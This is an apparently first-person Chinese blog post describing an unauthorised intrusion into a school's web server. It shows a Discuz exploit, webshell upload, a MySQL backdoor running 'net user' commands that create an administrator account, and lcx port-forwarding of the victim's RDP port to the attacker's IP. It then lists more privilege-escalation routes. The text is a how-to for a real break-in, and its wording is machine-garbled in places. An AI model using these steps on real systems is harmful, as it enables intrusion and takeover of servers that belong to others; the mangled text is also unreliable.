快速实例攻击某学校网站历程[网络技术]

本日某**发我一个学校网站,说10分钟咋样.闲来瞧瞧!

1、取Webshell之旅
从整体看上去MS是帝国CMS,固然近来0day风行但帝国CMS还真没啥办法呢!硬的不行,咱就来旁注吧!从目标站上看上去,有很多都是同类的CMS站.有两个论坛,一个dz7.0据说有漏洞暂时还没人放出.另一个DZ7.2,爆发0day.于是乎,目标先锁定这个dz 7.2.

1、拿出dz 7.2 exp,测试之.
2、注入成功,一句话地址forumdata/cache/usergroup_01.php
3、上传webshell.
4、三分钟拿下webhsell.上去找找了还没发现目标站的目录,翻开配置文件看看.本来是root.哦耶!提权之!

2、提权之旅

先用mysqldoor试试,上传之.
引言:Mysql BackDoor是一款针对PHP+Mysql服务器开辟的后门,后门安装后为Mysql增添一个可以履行系统号令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙木马.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.

提权步骤:
1、输入用户密码,后门安装之!

2、安装成功,select state("net user")履行号令net user 成功返回!

3、这样就有system权限了,select state("net user admin udb311 /add")用户增添上;
4、select state("net localgroup administrators admin /add")用户晋升至管理组,此时administrator权限到手.

5、查看远程终端登录端口.
select state("netstat -ano") 查看端口,3389开启之!速衔接,无法衔接.

6、再看看端口情形,本来是内网IP.

3、lcx内网端口转发
引言:Lcx.EⅩE是一个端口转发工具,相当于把安全A上的3389端口转发到具有外网IP地址的B机上,这样衔接B机的3389端口就相当于链接A机的3389端口.Lcx程序多用于被掌握计算机(安全)处于内网的情形,被掌握机大概中了安全程序,固然可以举行掌握,但还是没有利用远程终端登陆到本机举行管理便利,因此在很多情形下,城市千方百计在被掌握计算机上开启3389端口,然后通过lcx等程序举行端口转发,进而在本地衔接到被掌握计算机的远程终端并举行管理和利用.

1、lcx上传之,再用mysqldoor履行.

2、在mysqldoor号令行下履行d:/**/**/lcx.EⅩE -slave 58.221.xx.xx（自己IP） 51 192.168.201.2 3389

3、在本地 lcx.EⅩE -listen 51 3389

因为我也是内网用户,还要做端口映射之.

4、内网映射
引言:端口映射就是将主机的IP地址的一个端口映射到局域网中一台机械,当用户拜候这个IP的这个端口时,服务器自动将恳求映射到对应局域网分机 .

进入路由器,因为我的路由器支持NAT 转发.下面我直接把51端口转发到公网.

成功禁用词语到51端口的数据返回.

5、成功登录
远程桌面衔接之192.168.10.254（本地IP）,假如碰到不能直接衔接本地的IP可衔接127.0.0.1.

浸透完毕!

总结:
提醒:此服务器管理员,有三个方面可以举行提权.
1、安装的serv-u,没有降权.通过溢出可以提权!
2、安装了搜狗拼音,替换文件可以到达提权!
3、利用了root用户,通过udf.dll或backdoor可以提权!别的,root还有多种提权办法,请注意咯!

本文针对内网浸透和内网映射做出具体阐明.对内网浸透的朋友们会有所帮忙,不足之处还请指出!